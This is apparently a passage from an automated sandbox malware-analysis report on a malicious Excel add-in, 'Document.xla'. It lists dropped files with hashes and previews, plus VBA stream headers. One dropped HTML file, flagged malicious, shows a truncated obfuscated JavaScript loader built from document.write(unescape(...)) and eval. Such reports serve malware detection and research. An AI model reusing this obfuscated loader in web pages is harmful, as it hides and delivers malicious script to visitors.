      SSDEEP:96:Etbg2s88nDcxg92/b5M9uWZBKlA+B79YIRdMZgmR7qii1BoFV:EQcC9+xWZ4F79RdGgmR7qii1BY
      MD5:4E25E9BE3A1940FB6814F2735A038B0D
      SHA1:6E1D261A98018B2607C5BD560B4B862CA9E61898
      SHA-256:2DC6D41F38C70D4A54FE78A05F7B2C784A962311245E7666ACB01FF4DEE3808E
      SHA-512:FAEE4B816356DC1FAFFBF12E870CE57ECF06C0A0F9EA223F847D8B6B99259F3D2E8C77EEC578131DDD737A55D86205AB1A10A44BFF5B5C2082B553BBC22F2336
      Malicious:false
      Preview:....l...........{...U...........:P...... EMF................................8...l...T................u.. 0..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):149960
      Entropy (8bit):2.713452798909628
      Encrypted:false
      SSDEEP:1536:nHOVuQ61ENUAI8DHW/97p8/JYbhaEUbN+cR+b8dhNLK:JX7cR+bIhNLK
      MD5:27F3847836DC1BB2EA1D0AA79F15E71C
      SHA1:8DFE1466E183EE61C382C030BD99B5ACA397B65A
      SHA-256:2734739704A9E0EFBBCFD7E146C31FA27A29112EB3D9B1522F34E5CD5D999B0A
      SHA-512:BC19C588257052D817762E2ECCBDE689249D3E2D5D0BD3B298312245169986CEA9CDD39F5C3358D7E2F58474E6FDAF5478616527729B1C567761048AA3E7927A
      Malicious:false
      Preview:....l...........................G....U.. EMF.....I..........................8...l...T................u.. 0..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n....................................... ...............p..7......u.h...........R................[}........7............0.................................X.
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):8208
      Entropy (8bit):2.369093087371633
      Encrypted:false
      SSDEEP:96:EYg2s88nDcxg9f45E9DWZBKlA+B79YIRdMZgmR7qii1BoFV:E5cC9MIWZ4F79RdGgmR7qii1BY
      MD5:F1A13B04C3D8CF0E2CD83B8527D92CFD
      SHA1:EAA4D5CE6A38E8E79172F6777C18014ADCC9D51B
      SHA-256:314028CCEDC751D6CA504FD1BD2047EF8C4EBA711CA1BE27C3C015B69B9CEACD
      SHA-512:3B2E99607AEDE0FDE965808A6B668870EE51FB2CEDA812B2573ABCA0F8D78A78FF67F7B467045AC4AD83F11B552824AA93949B348B3BA263E3906395845C8D0F
      Malicious:false
      Preview:....l...........{...U...........:P...... EMF..... ..........................8...l...T................u.. 0..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!...............................................|...V...K..............."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V..."...........!...............................................|...V...'.......................%...................................L...d...h...............h.......X.......!..............?...........?................................R...p...................................A.r.i.a.l...............
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):44256
      Entropy (8bit):3.147465798679962
      Encrypted:false
      SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
      MD5:36D8FF25D14E7E2FBB1968E952FF9C17
      SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
      SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
      SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
      Malicious:false
      Preview:....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):134544
      Entropy (8bit):2.9527588414114754
      Encrypted:false
      SSDEEP:768:P0WYNNkN2HtS1u40TiTKAvGNLnvfKx4t1cEU9W3V/DOEsx:pYN/Ni0TiTKeYjfKx4tCEU9W35psx
      MD5:83F48FDD46D3424E92E24E709EAB5960
      SHA1:6CEE65663B48B56BDFF6756C38C1F4190EAC6E12
      SHA-256:77F4BCE7FBE1E2F98A04DC51994467460B255135535CDE954EEE8180F500C6AE
      SHA-512:8F781049001FC063EDB9B4352C0EA05D8DA9DCFC599234A58258C6FB4C4CED2B862A701081F10B68E286124413AD04F4AAAB485D376B0A2FB04167AFF121F47E
      Malicious:false
      Preview:....l...............e............n...=.. EMF........6.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f..."...........!.............................................../...f...R...p...................................T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................@...............8/....X.....8/........................X...................N.8/@....y8/.....m8/|...............|.....................8/.................8/
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):1293620
      Entropy (8bit):4.563127917199792
      Encrypted:false
      SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
      MD5:F71C973B5E362DFD6408D6C009E5643E
      SHA1:24B3CE67B31BFD4791287932206D54C73489424E
      SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
      SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
      Malicious:false
      Preview:....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):109544
      Entropy (8bit):4.282675970330063
      Encrypted:false
      SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
      MD5:F7B9A8F20E64B2CB6B572BCBA5866236
      SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
      SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
      SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
      Malicious:false
      Preview:....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):8084
      Entropy (8bit):2.5551694039574895
      Encrypted:false
      SSDEEP:96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
      MD5:721E8AAC81F0A6D4659831CB8194D668
      SHA1:6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
      SHA-256:E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
      SHA-512:24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
      Malicious:false
      Preview:....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:HTML document, ASCII text, with very long lines (8810), with CRLF line terminators
      Category:dropped
      Size (bytes):8896
      Entropy (8bit):2.878591814356277
      Encrypted:false
      SSDEEP:192:tHaCEQ66dDJeum2oum25T6lS5KUJDVUKhC14GVf/Av66dDumAVYxequccVFArb7U:t1EQ66dDJeum2oum25T6lS5KUJDVUKhm
      MD5:DEC3461E0215192337302502C20CFB0C
      SHA1:17508DAB9F30150A7142C73E2D6E280511BC6F9E
      SHA-256:276A35425D98919D79AE668AF841EFC697448B18FF7729FBBC8C2DE034EABBB0
      SHA-512:730335E8A6437279A2494C5C91B28368BAC66FB0D0CAC444DFA0E73460B4ADCE5F06696E6AFF6138DA2C7DD95BB649F8C774CEAE55103AFB6CBD11EB37E65F92
      Malicious:true
      Preview:<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%63%25%33%38%25%33%38%25%36%34%25%36%32%25%36%36%25%33%35%25%36%36%25%33%35%25%33%32%25%33%30%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%31%25%33%37%25%33%30%25%33%32%25%33%36%25%33%37%25%33%37%25%33%39%25%32%32%25%32%39%25%33%62%25%30%61%
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 08:27:21 2024, Security: 1
      Category:dropped
      Size (bytes):1106944
      Entropy (8bit):7.749627073428886
      Encrypted:false
      SSDEEP:12288:BumzHJEUiOIBUzMTSmD3DERnLRmF8DgEPbxpsAQx1Zj+juEPEbzYHG2VoUhvzwBF:3BazbARM8D78Z+j5WYHjVvhQccBNM
      MD5:D4C6AC821C22BE30144711786C736A1A
      SHA1:96E697734DD3DCC47EBBE6BB9D3F1055F096C4F7
      SHA-256:AB5152794CA45D670AE3F13DE6BE92FB686C27705D2DF9CE0C00F76717BC61F3
      SHA-512:592E25F4E3B9640EEC6AD747A421F5498E4F25C74EE3BC47D06A79E4D5C30B0CA487B0518EDE189EE491D10D4678A3D0DC1144912E37F798A82D594E967B68BD
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview:......................>...................................M...................O...P...Q...R...................=...>...X.......m.......o...............................................................................................................................................................................................................................................................................................................................................................................................L................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K.......~.......;...................T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):864256
      Entropy (8bit):7.117538768194682
      Encrypted:false
      SSDEEP:12288:gTmzHJEUiOIBUzMTShD3DERnLRmF8DhEPqxpsAQx1Zj+jbEPFb:tBagbARM8Ak8Z+jK
      MD5:782D2FFF805DBC9ACE0897EB371DD0A5
      SHA1:BA61F25C89BC43795F02ED3201230BA7949B0A29
      SHA-256:FAB55502CAB7444F118AB75E3DE571253FD8BA7C6F1BB2EF7A910F9EB2DC6562
      SHA-512:041D875F70D4FE836BE9300F6BF50EF290921078019125C89FB073206F792E2E961168235653A57F94F26383906B4A4B454BDE9D21AF594FE72A02F3E215C8C1
      Malicious:false
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 08:27:21 2024, Security: 1
      Category:dropped
      Size (bytes):1106944
      Entropy (8bit):7.749627073428886
      Encrypted:false
      SSDEEP:12288:BumzHJEUiOIBUzMTSmD3DERnLRmF8DgEPbxpsAQx1Zj+juEPEbzYHG2VoUhvzwBF:3BazbARM8D78Z+j5WYHjVvhQccBNM
      MD5:D4C6AC821C22BE30144711786C736A1A
      SHA1:96E697734DD3DCC47EBBE6BB9D3F1055F096C4F7
      SHA-256:AB5152794CA45D670AE3F13DE6BE92FB686C27705D2DF9CE0C00F76717BC61F3
      SHA-512:592E25F4E3B9640EEC6AD747A421F5498E4F25C74EE3BC47D06A79E4D5C30B0CA487B0518EDE189EE491D10D4678A3D0DC1144912E37F798A82D594E967B68BD
      Malicious:true
      Antivirus:
      • Antivirus: Joe Sandbox ML, Detection: 100%
      Preview:......................>...................................M...................O...P...Q...R...................=...>...X.......m.......o...............................................................................................................................................................................................................................................................................................................................................................................................L................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K.......~.......;...................T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Dec 16 08:27:21 2024, Security: 1
      Entropy (8bit):7.749627073428886
      TrID:
      • Microsoft Excel sheet (30009/1) 47.99%
      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
      File name:Document.xla
      File size:1'106'944 bytes
      MD5:d4c6ac821c22be30144711786c736a1a
      SHA1:96e697734dd3dcc47ebbe6bb9d3f1055f096c4f7
      SHA256:ab5152794ca45d670ae3f13de6be92fb686c27705d2df9ce0c00f76717bc61f3
      SHA512:592e25f4e3b9640eec6ad747a421f5498e4f25c74ee3bc47d06a79e4d5c30b0ca487b0518ede189ee491d10d4678a3d0dc1144912e37f798a82d594e967b68bd
      SSDEEP:12288:BumzHJEUiOIBUzMTSmD3DERnLRmF8DgEPbxpsAQx1Zj+juEPEbzYHG2VoUhvzwBF:3BazbARM8D78Z+j5WYHjVvhQccBNM
      TLSH:7E3501D5B28DAB62C606563575F3939E1710AC03D902427B37F8732D2AF76D08607FAA
      File Content Preview:........................>...................................M...................O...P...Q...R...................=...>...X.......m.......o......................................................................................................................
      Icon Hash:cbe126242426202b
      Document Type:OLE
      Number of OLE Files:1
      Has Summary Info:
      Application Name:Microsoft Excel
      Encrypted Document:True
      Contains Word Document Stream:False
      Contains Workbook/Book Stream:True
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:False
      Flash Objects Count:0
      Contains VBA Macros:True
      Code Page:1252
      Author:
      Last Saved By:
      Create Time:2006-09-16 00:00:00
      Last Saved Time:2024-12-16 08:27:21
      Creating Application:Microsoft Excel
      Security:1
      Document Code Page:1252
      Thumbnail Scaling Desired:False
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:786432
      General
      Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ! . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 21 8f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "Sheet1"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      

      General
      Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/Sheet2
      VBA File Name:Sheet2.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` 3 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 fe 33 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "Sheet2"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      

      General
      Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook.cls
      Stream Size:985
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 60 98 0b bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "ThisWorkbook"
      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      

      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
      VBA File Name:Sheet1.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 10 75 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "Sheet1"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      

      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
      VBA File Name:Sheet2.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc c2 9e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "Sheet2"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      

      General
      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
      VBA File Name:Sheet3.cls
      Stream Size:977
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 a2 bc 42 cd 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "Sheet3"
      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
      Attribute VB_GlobalNameSpace = False
      Attribute VB_Creatable = False
      Attribute VB_PredeclaredId = True
      Attribute VB_Exposed = True
      Attribute VB_TemplateDerived = False
      Attribute VB_Customizable = True
      

      General
      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
      VBA File Name:ThisWorkbook.cls
      Stream Size:985
